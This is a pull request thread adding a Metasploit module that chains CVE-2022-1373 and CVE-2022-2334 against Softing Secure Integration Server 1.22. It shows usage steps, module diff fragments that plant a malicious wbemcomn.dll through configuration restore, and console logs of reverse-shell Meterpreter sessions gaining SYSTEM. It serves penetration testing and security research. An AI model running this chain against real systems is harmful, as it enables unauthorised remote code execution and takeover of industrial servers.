### PR TITLE
Add CVE-2022-1373 and CVE-2022-2334 exploit chain

### PR DESCRIPTION
**Pull request by ide0x90**
This PR adds a module and related materials for CVE-2022-1373 and CVE-2022-2334 exploit chain against Softing Secure Integration Server 1.22 that was used during Pwn2Own 2022 Miami. This is dependent on https://github.com/rapid7/metasploit-framework/pull/19075.

## Verification

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. Do: `use exploit/windows/http/softing_sis_rce`
3. Do: `set RHOSTS <target_ip>`
4. Do: Optional: `set SSL true` if necessary
5. Do: Optional: `set RPORT <target_port>` if SSL is set
6. Do: `set USERNAME <username>` if necessary. Default is `admin`
7. Do: `set PASSWORD <password>` if necessary. Default is `admin`
8. Do: Optional: `set SIGNATURE <signature>` to use signature authentication. `PASSWORD` will be ignored if `SIGNATURE` is set!
9. Do: Optional: `set DLLPATH <path_to_custom_dll>` to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.
10. Do: `exploit` and get a shell
11. Do: Recommended: delete `C:\\Windows\\System32\\wbem\\wbemcomn.dll`

## Vulnerable Software
Softing Secure Integration Server 1.22

This version is no longer available for download on the vendor's page, but I have a copy of the installer that I can provide.

## Test Environment
Widnows Server 2019 Standard x64.

## Test run
```
msf6 > use exploit/windows/http/softing_sis_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
RHOSTS => 192.168.50.119
msf6 exploit(windows/http/softing_sis_rce) > exploit

[*] Started reverse TCP handler on 192.168.50.254:4444
[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 192.168.50.119:8099 - Valid credentials provided
[*] Generating payload DLL...
[*] Created /home/kali/.msf4/local/wbemcomn.dll
[*] Saving configuration...
[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
[*] Sending stage (201798 bytes) to 192.168.50.119
[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
[*] Meterpreter session 1 opened (192.168.50.254:4444 -> 192.168.50.119:50525) at 2024-04-11 19:52:35 +0800
[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

## TODO
- [ ] Figure out why cleanup doesn't work. Manually deleting the planted DLL works, deleting it from within the opened session works, but deleting it with `session.fs.file.rm` doesn't.

### CODE REVIEW

File: modules/exploits/windows/http/softing_sis_rce.rb [hunk 1]
```diff
@@ -0,0 +1,316 @@
...
+require 'zip'
+require 'metasploit/framework/login_scanner/softing_sis'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+
```
Comment (sjanusz-r7) [inline modules/exploits/windows/http/softing_sis_rce.rb:15]:
```suggestion
  prepend Msf::Exploit::Remote::AutoCheck
```

File: external/source/exploits/CVE-2022-2334/template.c
Comment (sjanusz-r7) [inline external/source/exploits/CVE-2022-2334/template.c:1]: If we remove these payload files, we could potentially get an Administrator session from the Framework payload and one of the `getsystem` techniques would work to elevate to NT AUTHORITY/SYSTEM, and leaving us with less .c files to maintain. The current approach seems like technique 3: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md#3---token-duplication

File: modules/exploits/windows/http/softing_sis_rce.rb [hunk 2]
```diff
@@ -0,0 +1,316 @@
...
+          ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8099,
+          'SSL' => false,
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 300
+        },
+        'Platform' => 'win',
+        # the software itself only supports x64, see
```
[the remark this answers is not in the document]
Comment (ide0x90) [reply modules/exploits/windows/http/softing_sis_rce.rb:54]: No, I suppose there's no reason to have a x86 DLL - removed in afd4b8af2ea999964e73214d1e83621daf09e962

File: modules/exploits/windows/http/softing_sis_rce.rb [hunk 3]
```diff
@@ -0,0 +1,316 @@
...
+
+    # if the version is less than 1.30 it's supposedly vulnerable
+    # but there is no way to confirm vulnerability existence without actually exploiting
+    # so instead of "Vulnerable", return "Appears"
+    CheckCode::Appears
+  end
+
+  def exploit
+    # in this case, if it appears vulnerable, it should be enough to continue the exploit
+    unless [CheckCode::Appears].include? check
```
[the remark this answers is not in the document]
Comment (ide0x90) [reply modules/exploits/windows/http/softing_sis_rce.rb]: Added in afd4b8af2ea999964e73214d1e83621daf09e962

File: modules/exploits/windows/http/softing_sis_rce.rb [hunk 4]
```diff
@@ -0,0 +1,316 @@
...
+
+    # did the operator specify a custom DLL? If not...
+    if datastore['DLLPATH']
+      # otherwise, just use their provided DLL and assume they compiled everything correctly
+      # there is no way to check if it's compiled correctly anyway
+      dll_path = datastore['DLLPATH']
+    else
+      # have MSF create the malicious DLL
+      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')
+      arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
```
[the remark this answers is not in the document]
Comment (ide0x90) [reply modules/exploits/windows/http/softing_sis_rce.rb]: Yep, changed in afd4b8af2ea999964e73214d1e83621daf09e962

File: modules/exploits/windows/http/softing_sis_rce.rb [hunk 5]
```diff
@@ -0,0 +1,316 @@
...
+      vprint_error("#{peer} - #{restore_config_res_json}")
+      fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!"
+    end
+
+    # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup
+    register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')
+  end
+
+  # clean up the planted DLL if the session is meterpreter
+  def on_new_session(session)
```
[the remark this answers is not in the document]
Comment (ide0x90) [reply modules/exploits/windows/http/softing_sis_rce.rb:267]: Added in afd4b8af2ea999964e73214d1e83621daf09e962

File: modules/exploits/windows/http/softing_sis_rce.rb (hunk 1 above)
Comment (ide0x90) [reply modules/exploits/windows/http/softing_sis_rce.rb:16]: Good stuff! Added in afd4b8af2ea999964e73214d1e83621daf09e962

File: modules/exploits/windows/http/softing_sis_rce.rb [hunk 6]
```diff
@@ -0,0 +1,316 @@
...
+    if session.type != 'meterpreter'
+      print_error('Meterpreter not used. Please manually remove C:\\Windows\\System32\\wbem\\wbemcomn.dll')
+      return
+    end
+
+    # load stdapi
+    session.core.use('stdapi') if !session.ext.aliases.include?('stdapi')
```
[the remark this answers is not in the document]
Comment (ide0x90) [reply modules/exploits/windows/http/softing_sis_rce.rb]: I've tried something in 8d6a20634fe5b95903073cc3c0fd6a34d96245c1 - let me know if that looks OK!

File: external/source/exploits/CVE-2022-2334/template.c
Comment (ide0x90) [reply external/source/exploits/CVE-2022-2334/template.c:1]: I initially wanted to use Metasploit's C compiler like what was done for https://github.com/rapid7/metasploit-framework/blob/397781f2b1a51b9d8766918f9f7e6ab613f4b8b5/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb, or even just generate a "normal" DLL, but both ways of generating DLLs don't work for this exploit - for the Metasploit C compiler method the DLL needs to be compiled with the .def file, and for the "normal" DLL it spawns 18 shells of questionable stability on every exploit attempt.

I figured mutexes and some migration code would be a good idea and all that was already done before in the code for CVE-2017-8464 anyway, so I just reused that code. I'm sure the .c file could be a lot leaner in this case though (we only want to run shellcode and then migrate it to a more stable process).

**Comment by ide0x90** [comment]
> @ide0x90 what's the best way to get the installer from you?
I can share the installer over Google Drive, if that's OK?

**Comment by bwatters-r7** [comment]
> > @ide0x90 what's the best way to get the installer from you?
> 
> I can share the installer over Google Drive, if that's OK?

Yes, please send the link to msfdev@metasploit.com

**Comment by ide0x90** [comment]
> > > @ide0x90 what's the best way to get the installer from you?
> > 
> > 
> > I can share the installer over Google Drive, if that's OK?
> 
> Yes, please send the link to [msfdev@metasploit.com](mailto:msfdev@metasploit.com)

Shared the installer

**Comment by bwatters-r7** [comment]
Hi there; I've hit a few snags, but I think I have it mostly working- the only catch is that I get an error message when it tries to restore the configuration, reporting `Not available in current system state`
Is there something I need to do to finish setting up the target?

**Comment by ide0x90** [comment]
Darn, I forgot about that error - it's a tricky one that needs a workaround. I sent more stuff to msfdev@metasploit.com with additional info.

**Comment by bwatters-r7** [comment]
Hey- looking back at this now.  Why is this patch required?  Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?

**Comment by ide0x90** [comment]
> Hey- looking back at this now. Why is this patch required? Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?

The patch is to get around the "Not available in current system state" error. I wasn't able to get the "Restore Configuration" functionality working without it.

**Comment by bwatters-r7** [comment]
> > Hey- looking back at this now. Why is this patch required? Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?
> 
> The patch is to get around the "Not available in current system state" error. I wasn't able to get the "Restore Configuration" functionality working without it.

I guess the question is that this patch is likely not in a production environment, so would this exploit work in a production environment without the patch?

**Comment by ide0x90** [comment]
This patch changes a single byte to bypass the "Not available in current system state" error. I think this error happens because the trial version was used, but I have no way to prove that, or to confirm if it would work in production.

**Comment by bwatters-r7** [comment]
```
msf6 exploit(windows/http/softing_sis_rce) > show options

Module options (exploit/windows/http/softing_sis_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DLLPATH                     no        Custom compiled DLL to use
   PASSWORD   admin            no        The password to specify for authentication
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      8099             yes       The target port (TCP)
   SIGNATURE                   no        Use a username/signature pair instead of username/password pair to authenticate
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME   admin            no        The username to specify for authentication.
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/softing_sis_rce) > set rhosts 10.5.132.252
rhosts => 10.5.132.252
msf6 exploit(windows/http/softing_sis_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/softing_sis_rce) > check

[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[*] 10.5.132.252:8099 - The target appears to be vulnerable.
msf6 exploit(windows/http/softing_sis_rce) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] Generating payload DLL...
[*] Created /home/tmoose/.msf4/local/wbemcomn.dll
[*] 10.5.132.252:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_f69e17191ecd61e635578747747900f9.zip
[*] Sending stage (201798 bytes) to 10.5.132.252
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.252:49703) at 2024-06-10 20:18:58 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target

meterpreter > sysinfo
Computer        : WIN-JGPU2LIT1DJ
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

**Comment by bwatters-r7** [comment]
For what it is worth, I was able to get the exploit to work on our default DLL payload, but it did pop an error.  Is there a reason to use a custom payload to circumvent this error?  I can still interact with the server.  There are decided advantages to using the default payload and not having to maintain something new.
```
msf6 exploit(windows/http/softing_sis_rce) > show options

Module options (exploit/windows/http/softing_sis_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DLLPATH                     no        Custom compiled DLL to use
   PASSWORD   admin            no        The password to specify for authentication
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.132.252     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      8099             yes       The target port (TCP)
   SIGNATURE                   no        Use a username/signature pair instead of username/password pair to authenticate
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME   admin            no        The username to specify for authentication.
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/softing_sis_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/softing_sis_rce) > check

[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[*] 10.5.132.252:8099 - The target appears to be vulnerable.
msf6 exploit(windows/http/softing_sis_rce) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] Generating payload DLL...
[*] Created /home/tmoose/.msf4/local/wbemcomn.dll
[*] Sending stage (201798 bytes) to 10.5.132.252
[*] 10.5.132.252:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_f69e17191ecd61e635578747747900f9.zip
[-] 10.5.132.252:8099 - {"ErrorIdentifier"=>"errIdInternalError", "Message"=>"Internal error."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.252:8099 - Returned code 500, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) > [*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.252:49728) at 2024-06-11 08:18:35 -0500

msf6 exploit(windows/http/softing_sis_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-JGPU2LIT1DJ
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

**Comment by ide0x90** [comment]
The reason I used a custom DLL was because a default `msfvenom` DLL would get loaded by the Softing process during restore, but the shell wouldn't pop. I got around that by compiling the DLL with a `def` file which has the correct exports so it gets loaded properly, but this causes 18 short-lived shells to spawn and the process to crash. I took inspiration from the code written for https://github.com/rapid7/metasploit-framework/pull/9041/files to work around that.

I couldn't get the cleanup to work properly. If the exploit has been executed successfully before, it will fail in subsequent runs because the existing `wbemcomn.dll` won't be overwritten. This will result in the "Internal Error" message. This also leads to new shells because the existing `wbemcomn.dll` gets loaded again during the subsequent exploit attempts.

File: external/source/exploits/CVE-2022-2334/template.def [hunk 7]
```diff
@@ -0,0 +1,1398 @@
+EXPORTS
+    ??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@$$QEAV0@@Z @1
```
Comment (bwatters-r7) [inline external/source/exploits/CVE-2022-2334/template.def:2]: I'm not particularly familiar with this type of export table entry.  Is there a reason we're using a full path to the file that contains this function?  What happens if we run this on a host with the Windows system installed on the D: drive?  Can we somehow make this self-referential?

**Comment by bwatters-r7** [comment]
# Release Notes

This adds a module targeting CVE-2022-1373 and CVE-2022-2334 as an exploit chain against Softing Secure Integration Server 1.22.

**Pull request merged**